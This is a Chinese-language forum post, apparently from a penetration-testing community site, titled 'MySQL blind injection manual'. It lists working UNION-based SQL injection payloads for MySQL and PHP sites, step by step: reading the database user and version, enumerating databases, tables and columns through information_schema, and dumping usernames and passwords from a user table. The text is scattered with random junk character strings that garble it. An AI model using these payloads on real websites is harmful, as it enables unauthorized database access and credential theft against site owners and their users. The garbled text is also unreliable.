中国网络渗透测试联盟

标题: mysql盲注手册 [打印本页]
作者: admin    时间: 2012-9-13 16:27
标题: mysql盲注手册

+ Y% R7 r6 l# P  r' f, J教程内容:Mysql 5+php 注入
: q6 U$ c) ^- ^' s7 d" f7 z) s+ I3 }0 k& V2 C% b' Y2 {8 d* z5 `

% @; m5 `) R# q5 @) [( d' \8 r$ B
一.查看MYSQL基本信息(库名,版本,用户)0 i" N3 l) G8 Q+ W
" O7 d. w  t  K; q4 q) m8 l
and 1=2 union select 1,2,3,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),5,6,7,8/*; W4 q$ i" R+ d
1 U, z& X9 M. i: J% h: L$ X
二.查数据库
8 R3 u$ n8 j9 _. d8 N. f1 F5 J6 {( T. I9 p/ D2 n) G9 o2 O, T% B
and 1=2 union select 1,SCHEMA_NAME,3,4,5,6,7,8  from information_schema.SCHEMATA limit 1,1/*' J& P6 R# C* e3 o
limit 从0开始递增,查询到3时浏览器返回错误,说明存在2个库。* P) L+ N0 e1 }  t$ u6 W8 H( u/ s
( {) S9 t6 v/ \! w! g! {( }
三.暴表# G1 R2 g9 V: p4 B, ^7 C* K6 G
2 z* T* n( F* t: H% v
and 1=2 union select 1,2,3,TABLE_NAME,5,6,7,8 from information_schema.TABLES where TABLE_SCHEMA =库的16进制编码 limit 1,1/*
% r* C9 a# A2 v, h6 O" w% c2 R; A* S! x. J1 Z
limit 从0开始递增,查询到14时浏览器返回错误,说明此库存在13个表。: l& @, j1 |& Y$ P" E/ ~

' {' Y  C; X. ?: N3 Z四.暴字段
" }, l; t2 e6 t  |. F/ }4 H5 m
and 1=2 union select 1,2,3,COLUMN_NAME,4,5,6,7,8from information_schema.COLUMNS where TABLE_NAME=表的16进制编码 limit 1,1/*
5 y& H' L0 k+ u1 c% c$ [- P2 |0 h' @
limit 从0开始递增,查询到时浏览器返回错误,说明此表存在N-1个列。
; p- e* z/ \! p  o- G' H" d1 V) ?6 P
五.暴数据2 j- X3 b9 m* u" |, s
9 i& [7 w/ }6 T+ N
and 1=2 union select 1,2,3,name,5,password,7,8 from web.ad_user/*
2 g4 o, K( |0 z$ V1 m5 L; k- l- a
  J  f) O  B# g
这里直接暴明文的密码,大多时候我们遇到的是MD5加密之后的密文。
( J4 b$ ?+ U# I! E! q. I7 X



欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2